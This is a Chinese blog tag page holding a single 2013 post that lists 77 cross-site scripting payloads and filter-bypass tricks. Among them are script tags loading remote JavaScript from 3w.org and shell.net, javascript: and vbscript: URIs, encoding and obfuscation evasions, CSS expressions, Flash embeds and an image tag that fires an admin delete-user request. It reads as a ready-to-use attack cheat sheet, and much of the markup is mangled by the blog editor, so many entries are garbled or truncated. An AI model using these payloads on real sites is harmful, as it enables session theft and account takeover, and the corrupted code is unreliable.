标签 XSS 下的文章

标签搜索

Jonty

累计撰写 275 篇文章
累计收到 979 条评论
今日撰写 0 篇文章

搜索到 1 篇与的结果

2013-09-04
xss跨站脚本攻击 (1)普通的XSS JavaScript注入 <script type="text/javascript" src="http://3w.org/XSS/xss.js"></script> (2)IMG标签XSS使用JavaScript命令<script type="text/javascript" src="http://3w.org/XSS/xss.js"></script> (3)IMG标签无分号无引号 <img alt="" src="javascript:alert(‘XSS’)" /> (4)IMG标签大小写不敏感 <img alt="" src="JaVaScRiPt:alert(‘XSS’)" /> (5)HTML编码(必须有分号) <img alt="" src="javascript:alert(“XSS”)" /> (6)修正缺陷IMG标签 <img alt="" /><script type="text/javascript">// <![CDATA[alert(“XSS”)// ]]></script>” /> (7)formCharCode标签(计算器) <img alt="" src="javascript:alert(String.fromCharCode(88,83,83))" /> (8)UTF-8的Unicode编码(计算器) <img alt="" src="jav..省略..S')" /> (9)7位的UTF-8的Unicode编码是没有分号的(计算器) <img alt="" src="jav..省略..S')" /> (10)十六进制编码也是没有分号(计算器) <img alt="" src="java..省略..XSS')" /> (11)嵌入式标签,将Javascript分开 <img alt="" src="”jav" /> (12)嵌入式编码标签,将Javascript分开 <img alt="" src="”jav" /> (13)嵌入式换行符 <img alt="" src="”jav" /> (14)嵌入式回车 <img alt="" src="”jav" /> (15)嵌入式多行注入JavaScript,这是XSS极端的例子 <img alt="" src="”javascript:alert(‘XSS‘)”" /> (16)解决限制字符(要求同页面) <script type="text/javascript">// <![CDATA[ z=’document.’ // ]]></script> <script type="text/javascript">// <![CDATA[ z=z+’write(“‘ // ]]></script> <script type="text/javascript">// <![CDATA[ z=z+’<script’ // ]]></script> <script type="text/javascript">// <![CDATA[ z=z+’ src=ht’ // ]]></script> <script type="text/javascript">// <![CDATA[ z=z+’tp://ww’ // ]]></script> <script type="text/javascript">// <![CDATA[ z=z+’w.shell’ // ]]></script> <script type="text/javascript">// <![CDATA[ z=z+’.net/1.’ // ]]></script> <script type="text/javascript">// <![CDATA[ z=z+’js></sc’ // ]]></script> <script type="text/javascript">// <![CDATA[ z=z+’ript>”)’ // ]]></script> <script type="text/javascript">// <![CDATA[ eval_r(z) // ]]></script> (17)空字符 perl -e ‘print “<img alt="" src="java\0script:alert(\”XSS\”)" /> (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用 perl -e ‘print “<img scr="alert(\”XSS\”)”;’ /> (19)Spaces和meta前的IMG标签 <img alt="" src="”" /> (20)Non-alpha-non-digit XSS <script type="text/javascript" src="”http://3w.org/XSS/xss.js”"></script>(21)Non-alpha-non-digit XSS to 2 (22)Non-alpha-non-digit XSS to 3<script type="text/javascript" src="”http://3w.org/XSS/xss.js”"></script> (23)双开括号 &lt;<script type="text/javascript">// <![CDATA[ alert(“XSS”);//< // ]]></script> (24)无结束脚本标记(仅火狐等浏览器) <script type="text/javascript" src="http://3w.org/XSS/xss.js?&lt;B">// <![CDATA[ (25)无结束脚本标记2 <SCRIPT SRC=//3w.org/XSS/xss.js> (26)半开的HTML/JavaScript XSS <IMG SRC=”javascript:alert(‘XSS’)” (27)双开角括号 <iframe src=http://3w.org/XSS.html < </iframe> (28)无单引号双引号分号 <SCRIPT>a=/XSS/ alert(a.source) // ]]></script> (29)换码过滤的JavaScript \”;alert(‘XSS’);// (30)结束Title标签 <script type="text/javascript">// <![CDATA[ alert(“XSS”); // ]]></script> (31)Input Image <input type="text" src="”javascript:alert(‘XSS’);”" /> (32)BODY Image (33)BODY标签 &lt;body(‘xss’)&gt; (34)IMG Dynsrc <img alt="" /> (35)IMG Lowsrc <img alt="" /> (36)BGSOUND (37)STYLE sheet <link href="”javascript:alert(‘XSS’);”" rel="”stylesheet”" /> (38)远程样式表 <link href="”http://3w.org/xss.css”" rel="”stylesheet”" /> (39)List-style-image(列表式) <style></style> <ul> <li>XSS (40)IMG VBscript <img alt="" src="’vbscript:msgbox(“XSS”)’" />&nbsp; <ul> <li>XSS (41)META链接url <meta http-equiv="”refresh”" content="”0;" /> (42)Iframe <iframe width="320" height="240" src="”javascript:alert(‘XSS’);”"></iframe>&nbsp; (43)Frame (44)Table (45)TD <table> <tbody> <tr> <td>(46)DIV background-image <div> <div> (47)DIV background-image后加上额外字符(1-32&amp;34&amp;39&amp;160&amp;8192-8&amp;13&amp;12288&amp;65279) <div> (48)DIV expression <div>(49)STYLE属性分拆表达 <img style="”xss: expression_r(alert(‘XSS’))”;" alt="" /> (50)匿名STYLE(组成:开角号和一个字母开头)&nbsp; (51)STYLE background-image <style></style>(52)IMG STYLE方式 exppression(alert(“XSS”))’&gt; (53)STYLE background <style></style>(54)BASE </div> </div> </div> </div> <div> <div> <div>(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS <object width="320" height="240" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="”http://3w.org/XSS/xss.swf”" /><embed width="320" height="240" type="application/x-shockwave-flash" src="”http://3w.org/XSS/xss.swf”" /></object> (56)在flash中使用ActionScrpt可以混进你XSS的代码 a=”get”; b=”URL(\”"; c=”javascript:”; d=”alert(‘XSS’);\”)”; eval_r(a+b+c+d); (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上&nbsp;  XSS (58)如果过滤了你的JS你可以在图片里添加JS代码来利用 <script type="text/javascript" src="””"></script>(59)IMG嵌入式命令,可执行任意命令 <img alt="" src="”http://www.XXX.com/a.php?a=b”" /> (60)IMG嵌入式命令(a.jpg在同服务器) Redirect 302 /a.jpg http://www.XXX.com/admin.asp&amp;deleteuser (61)绕符号过滤<script type="text/javascript">// <![CDATA[ ” SRC=”http://3w.org/xss.js”> // ]]></script> (62) <script type="text/javascript">// <![CDATA[ ” SRC=”http://3w.org/xss.js”> // ]]></script> (63) <script type="text/javascript">// <![CDATA[ ” ” SRC=”http://3w.org/xss.js”> // ]]></script> (64) <script type="text/javascript">// <![CDATA[ ’” SRC=”http://3w.org/xss.js”> // ]]></script> (65) <script type="text/javascript">// <![CDATA[ ` SRC=”http://3w.org/xss.js”> // ]]></script> (66) <script type="text/javascript">// <![CDATA[ ’>” SRC=”http://3w.org/xss.js”> // ]]></script> (67) <script type="text/javascript">// <![CDATA[ document.write(“<SCRI”); // ]]></script>PT SRC=”http://3w.org/xss.js”&gt; (68)URL绕行 <a href="”http://127.0.0.1/”">XSS</a> (69)URL编码 <a href="”http://3w.org”">XSS</a> (70)IP十进制 <a href="”http://3232235521″">XSS</a> (71)IP十六进制 <a href="”http://0xc0.0xa8.0×00.0×01″">XSS</a> (72)IP八进制 <a href="”http://0300.0250.0000.0001″">XSS</a> (73)混合编码 tt p://6 6.000146.0×7.147/”"&gt;XSS (74)节省[http:] <a href="”//www.google.com/”">XSS</a> (75)节省[www] <a href="”http://google.com/”">XSS</a> (76)绝对点绝对DNS <a href="”http://www.google.com./”">XSS</a> (77)javascript链接 <a href="”javascript:document.location=’http://www.google.com/’”">XSS</a>
- 2013年09月04日
- 83 阅读
- 0 评论
- 0 点赞

Jonty

275 文章数

979 评论量

Jonty

绿水本无忧，因风皱面

青山原不老，为雪白头